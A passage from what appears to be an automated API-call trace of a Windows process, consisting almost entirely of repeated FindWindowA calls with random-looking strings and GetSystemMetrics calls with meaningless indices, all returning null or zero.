(lpClassName="jBQjgnZSCe8nPQHnppZqt456uNhaAAZ7eJqXZMwECM9T0ci76RojHkpC99IR3WsIMd3jKuWwP", lpWindowName="71MRVOgDko8fnPYlapdvxlUsBH29Cm3ORYkfrjRZDdw6LcpX33e1IOwWR2uaAtZVB5yi9ijSA") returned 0x0 [0308.276] FindWindowA (lpClassName="hTmfAUKYckdKB9Ppfr6SkbeR8PKPlKtGBlyLUlctAOGXldP7MVJKo22zHcL8AII08n8YXDzJF", lpWindowName="swERoC0nE0pAli9Mk6pyZdABIGpASsMZ6uUeHJj8Ut6sSUOT0ouihnKJGjkvaPWolzchUSmJq") returned 0x0 [0308.276] GetLastError () returned 0x57 [0308.276] GetSystemMetrics (nIndex=38894566) returned 0 [0308.276] GetSysColorBrush (nIndex=58992866) returned 0x0 [0308.276] GetSystemMetrics (nIndex=74928356) returned 0 [0308.276] FindWindowA (lpClassName="qabztw5K1eD28Kin4mMxkcNZnWrc6hIXQdczX4fr0RMtivVlvkI3S1WSxzzthFYqGEdkVpeKg", lpWindowName="G35SqTGtifPRHmoGrgKq6MbYsSXvy60MjweSbK31tz14EbA1KG3aMSFgDmnfMwafStMicLMPC") returned 0x0 [0308.276] FindWindowA (lpClassName="rAnGePtx5v3gYKbBkp7iE8TLmAZusXVJpKqtgPAOg1vriJN04X29XdBh8j0SCA0zKFZdSKQc5", lpWindowName="HaJ5P1fJXE0YMq1we9QL2rKEs8yKDAVn3QLJwWy0vNKb4LTfLMMLq080gXW8zW5v6qCQNwWaE") returned 0x0 [0308.276] GetCurrentThreadId () returned 0xbe0 [0308.276] GetSystemMetrics (nIndex=27565933) returned 0 [0308.276] GetSysColorBrush (nIndex=39664892) returned 0x0 [0308.276] GetSystemMetrics (nIndex=56778624) returned 0 [0308.276] FindWindowA (lpClassName="GJhxWkhVYO3dJfBuCov1eETvOmdRXXNsyE4NHRkTZCBldIkbSUz2k4XdH9VxSffSaITvgEsji", lpWindowName="ykKPltKud5EUWDutAgMVsvmUM03YmjIqtYFpEFljgwsA1AnevjPJC0d543tUYLjC0XVLuq9Ca") returned 0x0 [0308.276] FindWindowA (lpClassName="tm9WgMaF0mJKATWd43OflAQsoC7WO95efK2h3B98kTDHqyzKXoJMFchjR1wTYI67ekrUydLRJ", lpWindowName="eOpxcfBn4tzYABythRDUSLUcbCkFeXVwVQZaOA2jb1NDCX3vP20n39X6hhgnz4Mf1it18OLKd") returned 0x0 [0308.276] GetLastError () returned 0x57 [0308.276] GetSystemMetrics (nIndex=96668673) returned 0 [0308.276] GetSysColorBrush (nIndex=32857288) returned 0x0 [0308.277] GetSystemMetrics (nIndex=67259265) returned 0 [0308.277] FindWindowA (lpClassName="NaQPFKnSJuhqhH2WlcvyL4MAeQXggMnn79XAVJRrz1uBdbraRvC4iU1b6GvS1TiZMqvUrwcY7", lpWindowName="XFyxfRWIz9RwJakyvPmMoLBCRyp0qZbXHjtanzWWpCmfLf8hgMcVOxm7E0c9GUa8m6xqqEZ1E") returned 0x0 [0308.277] FindWindowA (lpClassName="KWTSqZTqOpaZDAqyRvJykTwFn3VsamFkqU1BcDuG07mjjq873tLM70Rm3tBHYf2FpMSsvHgod", lpWindowName="RJCXTNIfkulpeHgd1xYctR9RF3YxVeBJKYQu7A0XTaehlb8tRbhXVz9Az1I6BDvjwRgw6eX3a") returned 0x0 [0308.277] GetCurrentThreadId () returned 0xbe0 [0308.277] GetSystemMetrics (nIndex=63979664) returned 0 [0308.277] GetSysColorBrush (nIndex=59442956) returned 0x0 [0308.277] GetSystemMetrics (nIndex=59772628) returned 0 [0308.277] FindWindowA (lpClassName="2hXyhlbqHeXKIYpOhzGZdGTzkPJe5AhAzvRdS9AaopPbPCxcxwTJIK38Dwmj69IK6KVxSN2yF", lpWindowName="kY8vbduFDFDHnZw3L1gm3H3VlGaUSvXonVZYjXaRgVNcJNzs08I7m4baYXjmxEHysOozZhzLj") returned 0x0 [0308.277] FindWindowA (lpClassName="soZncwBZWwjV3ZoDNJq8VJQUEOLJ8jECD92Bxch5N00ZEPdi8nfR9Od6xmldTHodT9cZ93mGp", lpWindowName="0SCl9nTdejMgZRlccTGX8vuKrACuTi9DM5uXp9fEKZABTNEQDgsYmP69ydQsKCjSE1FtVosqE") returned 0x0 [0308.295] GetConsoleWindow () returned 0x0 [0308.295] GetSystemMetrics (nIndex=66737896) returned 0 [0308.295] GetSysColorBrush (nIndex=39332944) returned 0x0 [0308.295] GetSystemMetrics (nIndex=72679656) returned 0 [0308.295] FindWindowA (lpClassName="NZSlQiFqDMeb4hgxaWXxsxi3ACh0XXdea2vQfNw0KkibxehT3v5G2OhZgKZmCVSQ9iCvUX1zC", lpWindowName="bgtUaYhSJcgVSEe4d3mbHE3wyiGOft3KmuvFnijwndit6Bb5rW1ssFwxwZrptnzsTGlZHvojW") returned 0x0 [0308.295] FindWindowA (lpClassName="S3mPW6Yl2M9LhIU3FqTyDvZdPUBXCBZ37CFjIy9znmJIgWyT7YIgH05yfrCMvfoH1VDKMYcf1", lpWindowName="N8tTeVZOXj6Sj9AMQKHQNTkRuv0HclWhC9NY7bxX4xfkPrCtcI90Gp8YjRnkbQUJSCLwxsz3z") returned 0x0 [0308.295] GetConsoleWindow () returned 0x0 [0308.295] GetSystemMetrics (nIndex=29473634) returned 0 [0308.295] GetSysColorBrush (nIndex=64783384) returned 0x0 [0308.295] GetSystemMetrics (nIndex=49977668) returned 0 [0308.295] FindWindowA (lpClassName="cdbhY3sPWbgPei2Rv4zNEaZDFtvsXZw234XoJil2JPwKFB81iFPt8VwYU9KSTc7TxJS5fgjZI", lpWindowName="EQxiTmCX4VVSgoKEVwwgXEGiQUNloYdC41w2UFYwoXBcjNemZauOR03U9ph3iHa1QFt7EeMp9") returned 0x0 [0308.295] FindWindowA (lpClassName="joTD3Roe9tUhzNCjFkhMJ9N1XXwN9r6Mjb526TR5xScJ1D4VjfrfwmOZGylOWSPdkICuBVbdX", lpWindowName="wWsOrkBPg1kIAEXDdao2rPY9Tmtf4IA5WaZ8awIzaTgyKnutVL7pdQQGnJwoIY54dGi6BxMDm") returned 0x0 [0308.296] GetConsoleWindow () returned 0x0 [0308.296] GetSystemMetrics (nIndex=23624857) returned 0 [0308.296] GetSysColorBrush (nIndex=65466359) returned 0x0 [0308.296] GetSystemMetrics (nIndex=56385423) returned 0 [0308.296] FindWindowA (lpClassName="0synipUKG3NoPJ53xAdfUxcPu6Q5IJB1U2zn9kaY4mOsN03T3z4D5HTaYd7tFsR0FvWCDz06y", lpWindowName="oyfsRaUwIQjMDtCJjXwy5PcXLicsSIwDbDSNVufCXt5NWzVipntaBawfSWL3TtuQP2t0APmhI") returned 0x0 [0308.296] FindWindowA (lpClassName="hzxfz0STGR3su0HxcrqCQMsVUX4jF7ZYNRVdoV5Y4fYPkSeGjxoXjAGxtI8m19vmCZI9YZU23", lpWindowName="o4opxOK84fta7oiKuQlPhKATD4GMsKNVH7Wfi1zg5YOvtVkrnzspgnKy5tETPiUphdxe2Scrb") returned 0x0 [0308.296] GetConsoleWindow () returned 0x0 [0308.296] GetSystemMetrics (nIndex=22387723) returned 0 [0308.296] GetSysColorBrush (nIndex=29366647) returned 0x0 [0308.296] GetSystemMetrics (nIndex=28363897) returned 0 [0308.296] FindWindowA (lpClassName="EWq1n8pIK3y8PebTkARVZR0DshPvYlRIDNgIaW8hqeueIFFc8Ah5QrfAPnUt1fm1jomYqLMlf", lpWindowName="1JyHaoYLHGNfzs4hiV6eYBQFaJ81eyTn3iSAM5r4R3MBFj8vRrqVxLAOy99exXT5bbbvHYEMy") returned 0x0 [0308.296] FindWindowA (lpClassName="N8p5O7p6UMlRxwQ0gpLRWaNEKvGkmY5kinZQ6XeFHZl1F6yKWN9wGTC2s6aatIYHgVdPedIoA", lpWindowName="qg101S7HPjM8oTPRr0e6FAzwzAENDGJVm9kFydOVVq0pUZ63bMA4rciLwRDfospupEkLJQ65r") returned 0x0 [0308.296] GetCurrentThreadId () returned 0xbe0 [0308.296] GetSystemMetrics (nIndex=23998257) returned 0 [0308.296] GetSysColorBrush (nIndex=95327665) returned 0x0 [0308.296] GetSystemMetrics (nIndex=24972275) returned 0 [0308.296] FindWindowA (lpClassName="8ksHpDhFkSP3msI6XZMEwGusP3SjwgyDrgY9TcX1dY3RIctvUY16XSOiiZqTo9VxlSDaEFPgT", lpWindowName="hS46TFudBBKa5jiZPnCEDzHOTJcJwef0hg0ANLZMur7bed0KPb9PBkwzFeaKQbIbSBRl1scEx") returned 0x0 [0308.297] FindWindowA (lpClassName="0AiMpIzXoaswtGzU6wy9iUxz2Y2fKO8c7WYFWJhnUqUn6TDQvVpDlfyXC9nuPUABJkOmfySds", lpWindowName="s79ax7uR5QwN3gcifOpKg0RM3RXuN3aKtr60OvEXdaEYS8fsa4aLEli2Yl4L4vSa6xKTm1QJJ") returned 0x0 [0308.297] GetCurrentProcessId () returned 0xf94 [0308.297] GetSystemMetrics (nIndex=82887344) returned 0 [0308.297] GetSysColorBrush (nIndex=45883898) returned 0x0 [0308.297] GetSystemMetrics (nIndex=27588487) returned 0 [0308.297] FindWindowA (lpClassName="9RxG5WLsE9f6ebsOTWbp8XIDgvWpgXGELxdEQOmiogcVQq7sZe2nsaw4Ee2fgWq21JU2Idl6E", lpWindowName="3S2GU59vVJVXO6aMx3QRb0xN2pI1y7pEgBpN6u9bEKwO76uAIrnHfcFYWeSgMJM08iYfRYDLB") returned 0x0 [0308.297] FindWindowA (lpClassName="CvxQXSd1tY9cmDzPdSIiwEtLHXVZsObjhSXpcfJ2aHgWeujLwzo8X96pNpLPnVhxSPRW0M25Q", lpWindowName="5F6wvy5JvKJa2djXrvvFDy6HLhk91Rggxp9WW1wYsVx5W0yG83ALuOHiI6yefMSqsKTlXhBhU") returned 0x0 [0308.297] GetCurrentThreadId () returned 0xbe0 [0308.297] GetSystemMetrics (nIndex=78859877) returned 0 [0308.314] GetSysColorBrush (nIndex=87224259) returned 0x0 [0308.314] GetSystemMetrics (nIndex=63949668) returned 0 [0308.314] FindWindowA (lpClassName="0QpZG9Uv54oGDDU5Qe8dZhX63rnPGGKZPb8jpgBfQtNRRxJ7Gc2dwPMY20H08Xwi0at2jVEr6", lpWindowName="diFwB4sAfmWR9Y4CP51DYzsDa6KVaDXAq6SHALXYpYf1bCi3eM6KWvIAASKJEO4Lb4bWozXys") returned 0x0 [0308.315] FindWindowA (lpClassName="4bVrNFVCYsA4K3Z6qeY0dLL7FNP3EehjTFOB7BoSptqXhGNFohRDz6vZVDReB6mxB0ZRaxbIR", lpWindowName="ihUPEYYFiiHS6HDN1kvhys8yv2BTixWgo5eeCVjy4wOCWaqQ12lrf58Tp9dlF4BG5xMLLGybR") returned 0x0 [0308.315] GetConsoleWindow () returned 0x0 [0308.315] GetSystemMetrics (nIndex=49746837) returned 0 [0308.315] GetSysColorBrush (nIndex=62533568) returned 0x0 [0308.315] GetSystemMetrics (nIndex=25692439) returned 0 [0308.315] FindWindowA (lpClassName="a7ZYwr4aTG2C7Qia3eeMydkfj2i13Pl32CTfFJ8zmglOu2GohPm2YQox9Kos6Ydc0ahMkQYpM", lpWindowName="qrMZEYnTQmK7lIhDLqGDyxsvVr0wSSm5SgMHz26YjkS8taguJgNakyOO9TJXQXpS68k8Rbkxg") returned 0x0 [0308.315] FindWindowA (lpClassName="4IzwW8GrZPpwYWcp6k8cactZ8rqYI0jHSGvY134iPlCeClSxjb7OdAsExNBNcNDG5OqjGagEu", lpWindowName="biZj9SKb47QxlfFjnWpMXD22rqy3wHKdP8es092dAcDHXjkOCjQJ0cyIXmWiNHDahXnZfIpnL") returned 0x0 [0308.315] GetLastError () returned 0x57 [0308.315] GetSystemMetrics (nIndex=85567567) returned 0 [0308.315] GetSysColorBrush (nIndex=92476942) returned 0x0 [0308.315] GetSystemMetrics (nIndex=42768792) returned 0 [0308.315] FindWindowA (lpClassName="8bIc6hBsZXDwghPpNQni4Lq5Tx60luda1xIhy5fBefyAMnFn1xH2rTdqgIkaE2HxsdX1KlWXt", lpWindowName="uFoiMD1uTyJ7xgEfAATAO8kk8zTp0KVDibIRxxEqm7GYOpb2ewRo8LXY4dLywY6pHUqINoKRX") returned 0x0 [0308.354] FindWindowA (lpClassName="qyiCvQEAVXHGUEnG96tWCTpbJXpgSkSjBb8QRKGcEr9EjJT8GSvwdkPZXdphPRP5Ylz86bsQe", lpWindowName="qtyKwsZSva2AIvKLuvHJniJMmpQNGl6WXVW0idt8Zaj95SzkXT8ZpDQjl947fr7MoUF0Flcbt") returned 0x0 [0308.354] GetLastError () returned 0x57 [0308.354] GetSystemMetrics (nIndex=49974226) returned 0 [0308.354] GetSysColorBrush (nIndex=98758449) returned 0x0 [0308.354] GetSystemMetrics (nIndex=47858228) returned 0 [0308.354] FindWindowA (lpClassName="C32OM1JOkib5I5qY2lFhXWGXsC6Pt0GIsFTnTZSg06VDgG1FdC5dyGE2qW4HvjBRZVStdwwCU", lpWindowName="j711hzV7fdWFcRBREldWDBwkevQR4yfm8dE4WK2uFXHuibsiEsoM3wStIAQI66y2qtuF65y5q") returned 0x0 [0308.354] FindWindowA (lpClassName="O3NPVQNjnEo925b76we7p5ieeI8tYWmFGzuR3cRjrXkzmQa4DXFe9OH46yIUFl0XjDqDsE9G4", lpWindowName="zCgWm0oojRZf5LDFzwJsEkG1BZUdWp6sah2jzzjFWtxsrDzQOU2vYTHHoJCDeC83luem7raLU") returned 0x0 [0308.354] GetLastError () returned 0x57 [0308.354] GetSystemMetrics (nIndex=22564423) returned 0 [0308.354] GetSysColorBrush (nIndex=94374964) returned 0x0 [0308.354] GetSystemMetrics (nIndex=66357998) returned 0 [0308.354] FindWindowA (lpClassName="3WfdXCHDPQPeQ8Hzynx6mMA0N7j95k7Ai4Z93xaG0PEPp1ZNxGFFhR1QMD6Wuzlezf98VVWnE", lpWindowName="YKI4JSgVS0qZFUD7BQv0TPW4sVCdFsdgaixwB9dyCCsn00KTMZMvbcowhjvKL4au1o6yALKxH") returned 0x0 [0308.354] FindWindowA (lpClassName="R85PlbWG9mVUhDpTNHVcrOHYmmgZ0TwQHuylQvPuof9VjztUg5Wq0L8hVnUsngdq6ON7GZ3fb", lpWindowName="zSJsfumcgLBzVfQv2MeiKlEOowgmHlpblyDwOvqaIegkroPTZZPyeZjCzIKAtaBnf44veM0gC") returned 0x0 [0308.354] GetLastError () returned 0x57 [0308.355] GetSystemMetrics (nIndex=99834987) returned 0 [0308.355] GetSysColorBrush (nIndex=39274352) returned 0x0 [0308.355] GetSystemMetrics (nIndex=54345352) returned 0 [0308.355] FindWindowA (lpClassName="p5rVitT7qS6HVFpazsCxRBW8B9EZF9cieLr3N4dvVM24tZMkytGETz3g9YtwPrNZH0cPG0rNl", lpWindowName="m83uv8WaDDx47SfOAI8xkpL5gdRpIXJ6ztcvK8XzZbBbDr9YDQSYwvlefn03A5SQmAsorh9hw") returned 0x0 [0308.355] FindWindowA (lpClassName="TY1SH4aSk6eXu8RAumtZfM15K4r9Xc2PkfrYQWDPotZIWI7qF4VkHbXt18J7NQQkGwrJFxR6N", lpWindowName="jM2zbncOGIWhSQHa53zPevMKwfbxzgyMxVMMkTRm0MKHCqzT0P5A2R8GpaaiWPLwDTAgZw3Yz") returned 0x0 [0308.355] GetConsoleWindow () returned 0x0 [0308.355] GetSystemMetrics (nIndex=46372229) returned 0 [0308.355] GetSysColorBrush (nIndex=52626973) returned 0x0 [0308.355] GetSystemMetrics (nIndex=43955985) returned 0 [0308.355] FindWindowA (lpClassName="BsORXtJTrPEvpoeCYHjZQnWIgNsQjiC0Y82GV5gMZ8pHG8vmB5uwGp1a83XIdD9d9dqvxWr1i", lpWindowName="SVgHCispIM9oCIpxKMcjIlYnFhGiU3Q1VBLAljpV00j6Gx2xDOyFyOIb5anh2CV0AgLTfbnLj") returned 0x0 [0308.355] FindWindowA (lpClassName="UvJTquguZlHg4yALGqKDZGxoOe4ZYyjogess9IUg7z2jqhEfxVJqn0Hiqfbroh4tkBMlNG8fs", lpWindowName="m9qx2ctP2HfowD8t408oH1PmUbEzvO2D3GWHdcVy3pukiyS5crtybk1crWfrFTqQfhtdHTwRW") returned 0x0 [0308.355] GetLastError () returned 0x57 [0308.355] GetSystemMetrics (nIndex=88457576) returned 0 [0308.355] GetSysColorBrush (nIndex=66339872) returned 0x0 [0308.355] GetSystemMetrics (nIndex=67986564) returned 0 [0308.355] FindWindowA (lpClassName="hREY7DLgjznUiKDG0mzmTJq4s8uQ5NLHrYzX4l28T8yGh5UaY0bytXhWmqflCvCViHKEtXTFK", lpWindowName="STB2EN0BCAquxpxf2AzCDJAs36iL06SiqRTTdrDnouIVLqOmUdgZXtS53IvDgj5ogqoUe3CHa") returned 0x0 [0308.355] FindWindowA (lpClassName="Wgxsxcwv8s0G9s83W4BNn3SyYcW0uxdCAB7nmt6658emjMaKXwNEFXgz2lIG41uJDsKLEubuH", lpWindowName="DPCZEYIFmh2KNfmJlqzWBvCXJxhZFaBpm1eHxtWPB1ItdsWlhi1vhT8FDDaKoHW2rLc6AvePJ") returned 0x0 [0308.355] GetCurrentProcessId () returned 0xf94 [0308.355] GetSystemMetrics (nIndex=82936438) returned 0 [0308.355] GetSysColorBrush (nIndex=33528375) returned 0x0 [0308.355] GetSystemMetrics (nIndex=94253684) returned 0 [0308.355] FindWindowA (lpClassName="Etz2meRpfwY3Rb07xoQ3jKRkDmupQrNsL1TmvYOZ5bL8lGfUOE5CIZLk4Nnar1jbJBuF9sP2w", lpWindowName="WU1bTwDwHKElzSSjBbvvi6X9ISz24DSpKSKQEDc8MolsspWqMwo2iSKoUn9jvXWnvbW0F0GH0") returned 0x0 [0308.356] FindWindowA (lpClassName="EBt9S4DDQn19BblMuJs5c7LaHJ16TfkhzGDow7MneyNKzVlqet7FFsSNUVpy2I03lOJjOpuPR", lpWindowName="eNks7VZXGlnNqrOvpwNoiWqo3oHv84DQbhKSq6klv47OZi9wBBJYKEnxxuV1mj3g9vBJ2LTPn") returned 0x0 [0308.356] GetCurrentThreadId () returned 0xbe0 [0308.356] GetSystemMetrics (nIndex=38676746) returned 0 [0308.356] GetSysColorBrush (nIndex=36564797) returned 0x0 [0308.356] GetSystemMetrics (nIndex=37659558) returned 0 [0308.356] FindWindowA (lpClassName="vxr08IES8jYNcr34xTft0d7ghZBWAv7vOaXryg6JJ69ehAZ8Ki063ra5c2DUIIq03fCdDDxaA", lpWindowName="PgWc6rzt26xoiruLrwxOPOKHqlvPsLsT7izFsP1j106ZpPpKU04KOk5Ua7LIrTuVH18CBktRr") returned 0x0 [0308.356] FindWindowA (lpClassName="hFO98XklvxFefZOTsKRPeWWsM3OLWrHd54Wg8NLSJh1DSdB7XbnwEP4cmXFQCLWMLzbV9NINA", lpWindowName="RWGap93S25ue9CHBn2TeWlQjRFp6NMgQ3msl2PbixNNgVGNTDB2hvzsojL6BYOXXsqwblyU7a") returned 0x0 [0308.356] GetCurrentProcessId () returned 0xf94 [0308.356] GetSystemMetrics (nIndex=53465499) returned 0 [0308.356] GetSysColorBrush (nIndex=92945598) returned 0x0 [0308.356] GetSystemMetrics (nIndex=62354262) returned 0 [0308.356] FindWindowA (lpClassName="dJcsdaMWTYl813lLKht9uAei8rVtXJOAY0Q0nty9AGV3sUy2pvuLt3xiHftn6bToDkmNAP2sa", lpWindowName="3iHjRVj1XkJTGzE0j64tbu25jjZXVOeAzwnAbjJVMzP0MMHqzIctsRDuwHN65dwg6TacFe8b9") returned 0x0 [0308.356] FindWindowA (lpClassName="CIbMJM2jDOyQWPJR2v94gbqtMrEOZtiaW19dbQQTj1beZjVLzgDozOFU45xIJwqk3ZRWZ4KGn", lpWindowName="wq8azNDkAqF0sTAMG6DFeM58ZjzJuQpSv9lVUkEBM4m2s0GufdkpgZgQIUlEhtGZw2HsSkaFh") returned 0x0 [0308.356] GetLastError () returned 0x57 [0308.356] GetSystemMetrics (nIndex=65468342) returned 0 [0308.356] GetSysColorBrush (nIndex=36977625) returned 0x0 [0308.356] GetSystemMetrics (nIndex=53829287) returned 0 [0308.356] FindWindowA (lpClassName="EurTVeLZxQhOFrvVD5x00LFEPhJON60tmzqU5sNZ8KXPYCygq74cjIhqneoAFEjoU7kdsPcw4", lpWindowName="t7j7MGSqqiQRFfZ82BUw5rnb6hFmvUR6NZo9omhFFnpl83MXmakYTTOrAd689CmHTtydggFaf") returned 0x0 [0308.357] FindWindowA (lpClassName="xErGsRiYKLXdQrqTDb3XUV4HH6Nb2j4xTLIs01QcCwnyGeJ4V5IjARNj3Kepf3CmNa0vyQmHM", lpWindowName="UfwJKotgKDMCDN1yCebDYfJ9zyHTbCT79XDtdRKA4zXniEa8uj4ePKTKZu5ziMWLCVnHxwITN") returned 0x0 [0308.357] GetLastError () returned 0x57 [0308.357] GetSystemMetrics (nIndex=73976889) returned 0 [0308.357] GetSysColorBrush (nIndex=73877538) returned 0x0 [0308.357] GetSystemMetrics (nIndex=69578834) returned 0 [0308.357] FindWindowA (lpClassName="4uis42nxhWgRrdYJlqOoUdDhD6Z6bj8qIiwmZrSFT83WXNgkENYKOHSYRyRzUVBucWbP9EVgm", lpWindowName="4tHEtTWQ8ZJX4nopK0o5sJmkTwnYMwZakBN0WKu601Va9BBBjxNCNM5C4gNo9LtxEO6FqsGEr") returned 0x0 [0308.357] FindWindowA (lpClassName="hBy6oisO1wyI3nNDSdo7stJKiya5KCdJ6qQw9f0QNQebqDwFfmvPhGlhvBXzxaOIRk6uTeNuY", lpWindowName="vj7aNVCESml51o0AagGwTPE1owHmNu5jZuidK4jDXvhyeUzfKtepCoHnTwzMAfXEYbKnYyCku") returned 0x0 [0308.357] GetConsoleWindow () returned 0x0 [0308.357] GetSystemMetrics (nIndex=28478686) returned 0 [0308.357] GetSysColorBrush (nIndex=25344354) returned 0x0 [0308.357] GetSystemMetrics (nIndex=57554997) returned 0 [0308.357] FindWindowA (lpClassName="pVS51yOdk7N0SWxx1SpToxqfaMeu3B5sybEhceRawHjmytCECYVFbt5ZKdx64KdN9CVkLUEVZ", lpWindowName="KZ35zGr1Zrl25aeXGtvXptI68kTbSEJebcUdDgDLuuX6eFKu9x3MELFsUDPUOrnUZi57ohfe8") returned 0x0 [0308.357] FindWindowA (lpClassName="uT65bvePvrQoDTciQ1Ee3vSx7pvtDamdMz5FGsDMLM1dtVjhna5fc39NL6GVDj4ABgYMsX0ld", lpWindowName="176rBfgiuujLnk9w1iPmkx9SSSSgkEd59kUeriQvdOKsuiWmW8LodasTrC0jfAtIJLQZuRiZ8") returned 0x0 [0308.357] GetConsoleWindow () returned 0x0 [0308.357] GetSystemMetrics (nIndex=97498644) returned 0 [0308.357] GetSysColorBrush (nIndex=39395445) returned 0x0 [0308.357] GetSystemMetrics (nIndex=35448329) returned 0 [0308.357] FindWindowA (lpClassName="fr3WnGp1F3l0ZgsoPd0MaPr0hY9nGV2lhd3N2F7gibJHYmvyuqmCygnUvzwgQJOVOp6EN9jNT", lpWindowName="XG2ELkwqthl2BTI2sBpKpUoLVx6d96DOcEKP8TG1ZsARy6fdSqo8QplLXW00DsDvUDu5n3fWT") returned 0x0 [0308.358] FindWindowA (lpClassName="KlXfJJbSvvp9aTfOFscrkOSM82QHPP8EURqqTht1dDqCP0tKyTvJuqTxVxocCub5aYJGlJJQ5", lpWindowName="yNhc0g1ZxS0ObYc4WGkUU8fzGnvwA60YgUoj75Lrn8Ak38O2OMJPd3ZcpARQJpIKmaoT7DkWk") returned 0x0 [0308.358] GetLastError () returned 0x57 [0308.358] GetSystemMetrics (nIndex=24383827) returned 0 [0308.358] GetSysColorBrush (nIndex=74466529) returned 0x0 [0308.358] GetSystemMetrics (nIndex=86854949) returned 0 [0308.358] FindWindowA (lpClassName="aena9fudgYixyEV6HnO6J3WSgsAvKPccUC5BwSGhuGWhkt2QEsQK0QCitZsofi3jZFZpay84i", lpWindowName="sXF9EU05Di1htxkgej0WCKVjd1piJE6N0SSRax0vqizV0r1cM7YVGFFUvfQwvsLv11v061W4r") returned 0x0 [0308.358] FindWindowA (lpClassName="hiTQ6Eo6WgiA1phRXnkAh4pEgsbKhp4AxqrMrhGWKVFekasCOBFPqoAvJ9me2vpWhStPyMqZ4", lpWindowName="KV3YsJwRYWnirT1ffk7DClDzS3jCxU98Smd9Xt3LeMfwQBtyp0kLIXrxMVbCn7dAjhfZRk0Pw") returned 0x0 [0308.358] GetLastError () returned 0x57 [0308.358] GetSystemMetrics (nIndex=82633555) returned 0 [0308.358] GetSysColorBrush (nIndex=99794782) returned 0x0 [0308.358] GetSystemMetrics (nIndex=89847247) returned 0 [0308.358] FindWindowA (lpClassName="lDeLSbT8SbJUKj1ZKC6G9WhrqAxIBM60WCp2DiULDDM2PSDQufYFl1qmAcap6kImqPV9lJ6mK", lpWindowName="nWQEQ5z3jJqwRbsxAd8Z9TtX7E4vKSAv9mhXDR4oZndjB0lXa56IygOveMk3XVP6FIpCqvJRI") returned 0x0 [0308.358] FindWindowA (lpClassName="xk6j2djKHyuJacrsrrSEcAA23TT4lqSjabscU6u5qh6pYlLCepT0NLnfF82RpE4N4wzIw7mIu", lpWindowName="kkHd5bOOxPVtJTpunwyjvMJUH3LIw9UEbP7RzEbycopLeppkQUzLhSC7qpWfcoaEnphSwOCmm") returned 0x0 [0308.358] GetCurrentThreadId () returned 0xbe0 [0308.358] GetSystemMetrics (nIndex=43466547) returned 0 [0308.358] GetSysColorBrush (nIndex=99739473) returned 0x0 [0308.358] GetSystemMetrics (nIndex=66873854) returned 0 [0308.358] FindWindowA (lpClassName="A9TFMkSx0GiXrHRlJanjq0WWRhz4LmXXNe0IVr0WZgdcVpEshVNnfMxnz60a8Na1Czu2zzye6", lpWindowName="4JObhcHGs86ArzLZ8oo75Z0ZnlkW5zMRYLlgp6I4W3SGt404cFNGvDWNpuf4EnUxk5aJFukwt") returned 0x0 [0308.359] FindWindowA (lpClassName="xeNsXhNyhRAk2Yr0f3PRAzFbgAGWIiQnbKHBgu1S4rMubDIag95oikAosBSsHDBrmY6WgBF8b", lpWindowName="Ox341Bxs0fHkKTKPGNKtLHKqlVFDXb7L9oTrdlAriOnu1PtXKvxboLNZgoNxpjfCufA4fTDnt") returned 0x0 [0308.359] GetLastError () returned 0x57 [0308.359] GetSystemMetrics (nIndex=88964394) returned 0 [0308.359] GetSysColorBrush (nIndex=44557953) returned 0x0 [0308.359] GetSystemMetrics (nIndex=56248436) returned 0 [0308.359] FindWindowA (lpClassName="da1xUzI0ME3ABtD9qKtdI0QMVCmu1iCGwup5T27ErbX9BUP7DwNoVxWOiZJWAKZnfFHwvZ6G6", lpWindowName="7KAhVhj1I9xdTmvk9VjDGKO3yQh0BmWdDkIxxC4qZpw8aaKJTJSx3rA5CnTUKgyK5QQwjjaF8") returned 0x0 [0308.359] FindWindowA (lpClassName="4IzRBumJa2quG6a7OpIfew6SsTWnEkJuBeTkvcVVmsAqZ8XCKa1qCAZ5Cbg83fN04NdvWeDKc", lpWindowName="M8xfLX6eiFU4fBatCfz4rGprcJoUf1qP4HzdNRASN3C6XPWw35bxEZz7saPfzeOkZ4R02v5XM") returned 0x0 [0308.359] GetCurrentThreadId () returned 0xbe0 [0308.359] GetSystemMetrics (nIndex=92858658) returned 0 [0308.359] GetSysColorBrush (nIndex=35848986) returned 0x0 [0308.359] GetSystemMetrics (nIndex=53853525) returned 0 [0308.359] FindWindowA (lpClassName="bgCfXRpG3MhovsHlDDfNBk04qbH0tZLyBVHbisMt6qCwy9PGxvwZ1JuWoM9X4NZWJYxsZ9Qgf", lpWindowName="KEb2pCsOn5GFuW3zpPaatNle7p95lzBUpchx2wk43s3iOUK4rfFjv3Us1mBYSBCQ31F1lGKI9") returned 0x0 [0308.359] FindWindowA (lpClassName="zzFM95lYrKuhGtvDbbTnTXY0IPR6J6tkabhSBntU04vWNdWmhiuV9NdQuv4QuLYUNXTKvo4AL", lpWindowName="ts0AwRZ4EpPkqOcLlzzXczpS6aVBepdJqH42KmHtja2TkwCAG1K39IYp6ur6G8stIJScNq13E") returned 0x0 [0308.359] GetLastError () returned 0x57 [0308.359] GetSystemMetrics (nIndex=77583456) returned 0 [0308.359] GetSysColorBrush (nIndex=78846346) returned 0x0 [0308.359] GetSystemMetrics (nIndex=88328878) returned 0 [0308.359] FindWindowA (lpClassName="M1U2MqpOhePXsFR2NvMRKGE0YaewOPCNVY3jDzzZXts2uoDrmNXiE36ZUykPf3sjJZDGji7Fg", lpWindowName="5NcZ0B4DJkmqZFYbxMFIAgunaLgvecOOxmDnwyMx0NMr1SJvFUSCSekuxVgOY8vO9wANr0BbN") returned 0x0 [0308.359] FindWindowA (lpClassName="rmoks31jrc1Szv4cLLpf6P0v7NoH9kVPVdTdjD5iGHqyyaR27KICp3LH9UkWDuCNX05LBVtVc", lpWindowName="7RiGWBoMqWklaFFpC9vJErOxAxGbdU9ceiEQ5MzOciSqn3cq49lIiw7LjdOwUzmwigtJKIFtn") returned 0x0 [0308.359] GetLastError () returned 0x57 [0308.359] GetSystemMetrics (nIndex=75758833) returned 0 [0308.360] GetSysColorBrush (nIndex=47666655) returned 0x0 [0308.360] GetSystemMetrics (nIndex=63552774) returned 0 [0308.360] FindWindowA (lpClassName="dQOn1SHDLML0tdlmyoXz4mwzW0ux2reztbQMd9tGdw448nVZhR4SrqDE13ydlvbxBPeKIuAuf", lpWindowName="SbDXKIIzihD0tLkN4zhKrqQ5XvZ5wKMrJnHhMDgoaPcC1Af6txVcSlcxpiXKCy4Lx0HYIQlqX") returned 0x0 [0308.360] FindWindowA (lpClassName="7s4AmNMnAgeFMi0XxQ4NJOvA8GRb33ukYm25ifkQHX2RFyiU5Vc8uo0RYoN8qKOkCGdiqJoNF", 